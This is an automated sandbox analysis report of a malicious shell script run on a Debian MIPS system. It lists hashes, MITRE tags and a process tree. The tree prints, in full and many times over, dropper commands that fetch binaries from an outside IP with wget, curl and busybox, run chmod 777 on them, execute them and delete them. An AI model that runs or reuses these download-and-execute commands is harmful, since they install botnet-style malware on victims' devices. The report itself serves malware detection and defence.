f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109

Analysis

max time kernel
115s
max time network
119s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
21-11-2024 08:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109.sh
Size

10KB
MD5

5c002a675bf13d9254cbcf71d0880ad7
SHA1

6b23ac737bbb2a21a5e8e322b7a85ce0bd035c04
SHA256

f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109
SHA512

66f9f99ad03a2a5b56bb54c3676f86d33a5d7e165bf9d7c1e43da38c2005258128fcf95746bc924ca55f6dae423b1f7762bce982455e40fc33534ac37d545a7f
SSDEEP

192:mLvHEMP7PbcMUXRRJOC1WKbD+DyDxe+qfr97COC7xN7877P3XS7eSsaTXkfrFOCY:gEamxe+OOzgvSonamxe+0SO

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
902	chmod
938	chmod
969	chmod
890	chmod
767	chmod
920	chmod
726	chmod
824	chmod
845	chmod
872	chmod
908	chmod
914	chmod
926	chmod
932	chmod
744	chmod
884	chmod
896	chmod
950	chmod
956	chmod
806	chmod
812	chmod
866	chmod
878	chmod
944	chmod
734	chmod
795	chmod
860	chmod
963	chmod

Executes dropped EXE 28 IoCs

Processes:

9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfOyG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3JCzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpVuWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HFIilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQqTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6lCMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBBrTVygq67bdKN5FrIylBdjC3WphUPQ5jBgAyQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYtEdto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoIe0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuGGjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdpV8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47MrTVygq67bdKN5FrIylBdjC3WphUPQ5jBgAjlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQqTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6lCMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBBV8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47MyQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYtEdto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoIe0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuGGjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdpuWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfOyG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3JCzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpVIilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt	curl
File opened for modification	/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI	curl
File opened for modification	/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l	curl
File opened for modification	/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI	curl
File opened for modification	/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M	curl
File opened for modification	/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO	curl
File opened for modification	/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J	curl
File opened for modification	/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV	curl
File opened for modification	/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB	curl
File opened for modification	/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA	curl
File opened for modification	/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp	curl
File opened for modification	/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J	curl
File opened for modification	/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ	curl
File opened for modification	/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp	curl
File opened for modification	/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF	curl
File opened for modification	/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO	curl
File opened for modification	/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV	curl
File opened for modification	/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8	curl
File opened for modification	/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ	curl
File opened for modification	/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt	curl
File opened for modification	/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB	curl
File opened for modification	/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8	curl
File opened for modification	/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA	curl
File opened for modification	/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG	curl
File opened for modification	/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l	curl
File opened for modification	/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF	curl
File opened for modification	/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M	curl
File opened for modification	/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG	curl

/tmp/f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109.sh
/tmp/f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109.sh
1⤵
PID:696
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:698
- /usr/bin/wget
  wget http://87.120.125.191/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  PID:705
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:711
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  PID:722
- /bin/chmod
  chmod 777 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - File and Directory Permissions Modification
  PID:726
- /tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  ./9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - Executes dropped EXE
  PID:727
- /bin/rm
  rm 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  PID:729
- /usr/bin/wget
  wget http://87.120.125.191/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  PID:730
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:732
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  PID:733
- /bin/chmod
  chmod 777 yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - File and Directory Permissions Modification
  PID:734
- /tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  ./yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - Executes dropped EXE
  PID:735
- /bin/rm
  rm yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  PID:736
- /usr/bin/wget
  wget http://87.120.125.191/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  PID:737
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:738
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  PID:741
- /bin/chmod
  chmod 777 CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  ./CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - Executes dropped EXE
  PID:745
- /bin/rm
  rm CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  PID:748
- /usr/bin/wget
  wget http://87.120.125.191/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  PID:749
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:755
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  PID:763
- /bin/chmod
  chmod 777 uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - File and Directory Permissions Modification
  PID:767
- /tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  ./uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - Executes dropped EXE
  PID:768
- /bin/rm
  rm uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  PID:773
- /usr/bin/wget
  wget http://87.120.125.191/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  PID:774
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:780
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  PID:792
- /bin/chmod
  chmod 777 IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - File and Directory Permissions Modification
  PID:795
- /tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  ./IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - Executes dropped EXE
  PID:796
- /bin/rm
  rm IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  PID:799
- /usr/bin/wget
  wget http://87.120.125.191/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  PID:801
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:803
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  PID:805
- /bin/chmod
  chmod 777 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - File and Directory Permissions Modification
  PID:806
- /tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  ./jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - Executes dropped EXE
  PID:807
- /bin/rm
  rm jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  PID:808
- /usr/bin/wget
  wget http://87.120.125.191/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  PID:809
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:810
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  PID:811
- /bin/chmod
  chmod 777 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - File and Directory Permissions Modification
  PID:812
- /tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  ./qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - Executes dropped EXE
  PID:813
- /bin/rm
  rm qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  PID:814
- /usr/bin/wget
  wget http://87.120.125.191/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  PID:815
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:816
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  PID:822
- /bin/chmod
  chmod 777 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - File and Directory Permissions Modification
  PID:824
- /tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  ./CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - Executes dropped EXE
  PID:826
- /bin/rm
  rm CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  PID:828
- /usr/bin/wget
  wget http://87.120.125.191/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  PID:830
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:834
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  PID:842
- /bin/chmod
  chmod 777 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - File and Directory Permissions Modification
  PID:845
- /tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  ./rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - Executes dropped EXE
  PID:846
- /bin/rm
  rm rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  PID:849
- /usr/bin/wget
  wget http://87.120.125.191/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  PID:850
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:858
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  PID:859
- /bin/chmod
  chmod 777 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - File and Directory Permissions Modification
  PID:860
- /tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  ./yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - Executes dropped EXE
  PID:861
- /bin/rm
  rm yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  PID:862
- /usr/bin/wget
  wget http://87.120.125.191/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  PID:863
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:864
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  PID:865
- /bin/chmod
  chmod 777 Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - File and Directory Permissions Modification
  PID:866
- /tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  ./Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - Executes dropped EXE
  PID:867
- /bin/rm
  rm Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  PID:868
- /usr/bin/wget
  wget http://87.120.125.191/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  PID:869
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:870
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  PID:871
- /bin/chmod
  chmod 777 e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - File and Directory Permissions Modification
  PID:872
- /tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  ./e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - Executes dropped EXE
  PID:873
- /bin/rm
  rm e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  PID:874
- /usr/bin/wget
  wget http://87.120.125.191/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  PID:875
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:876
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  PID:877
- /bin/chmod
  chmod 777 GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - File and Directory Permissions Modification
  PID:878
- /tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  ./GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - Executes dropped EXE
  PID:879
- /bin/rm
  rm GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  PID:880
- /usr/bin/wget
  wget http://87.120.125.191/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  PID:881
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:882
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  PID:883
- /bin/chmod
  chmod 777 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - File and Directory Permissions Modification
  PID:884
- /tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  ./V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - Executes dropped EXE
  PID:885
- /bin/rm
  rm V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  PID:886
- /usr/bin/wget
  wget http://87.120.125.191/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  PID:887
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:888
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  PID:889
- /bin/chmod
  chmod 777 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - File and Directory Permissions Modification
  PID:890
- /tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  ./rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - Executes dropped EXE
  PID:891
- /bin/rm
  rm rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  PID:892
- /usr/bin/wget
  wget http://87.120.125.191/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  PID:893
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:894
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  PID:895
- /bin/chmod
  chmod 777 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - File and Directory Permissions Modification
  PID:896
- /tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  ./jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - Executes dropped EXE
  PID:897
- /bin/rm
  rm jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  PID:898
- /usr/bin/wget
  wget http://87.120.125.191/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  PID:899
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:900
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  PID:901
- /bin/chmod
  chmod 777 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - File and Directory Permissions Modification
  PID:902
- /tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  ./qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - Executes dropped EXE
  PID:903
- /bin/rm
  rm qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  PID:904
- /usr/bin/wget
  wget http://87.120.125.191/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  PID:905
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:906
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  PID:907
- /bin/chmod
  chmod 777 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - File and Directory Permissions Modification
  PID:908
- /tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  ./CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - Executes dropped EXE
  PID:909
- /bin/rm
  rm CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  PID:910
- /usr/bin/wget
  wget http://87.120.125.191/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  PID:911
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:912
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  PID:913
- /bin/chmod
  chmod 777 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - File and Directory Permissions Modification
  PID:914
- /tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  ./V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - Executes dropped EXE
  PID:915
- /bin/rm
  rm V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  PID:916
- /usr/bin/wget
  wget http://87.120.125.191/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  PID:917
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:918
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  PID:919
- /bin/chmod
  chmod 777 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - File and Directory Permissions Modification
  PID:920
- /tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  ./yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - Executes dropped EXE
  PID:921
- /bin/rm
  rm yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  PID:922
- /usr/bin/wget
  wget http://87.120.125.191/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  PID:923
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:924
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  PID:925
- /bin/chmod
  chmod 777 Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - File and Directory Permissions Modification
  PID:926
- /tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  ./Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - Executes dropped EXE
  PID:927
- /bin/rm
  rm Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  PID:928
- /usr/bin/wget
  wget http://87.120.125.191/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  PID:929
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:930
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  PID:931
- /bin/chmod
  chmod 777 e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - File and Directory Permissions Modification
  PID:932
- /tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  ./e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - Executes dropped EXE
  PID:933
- /bin/rm
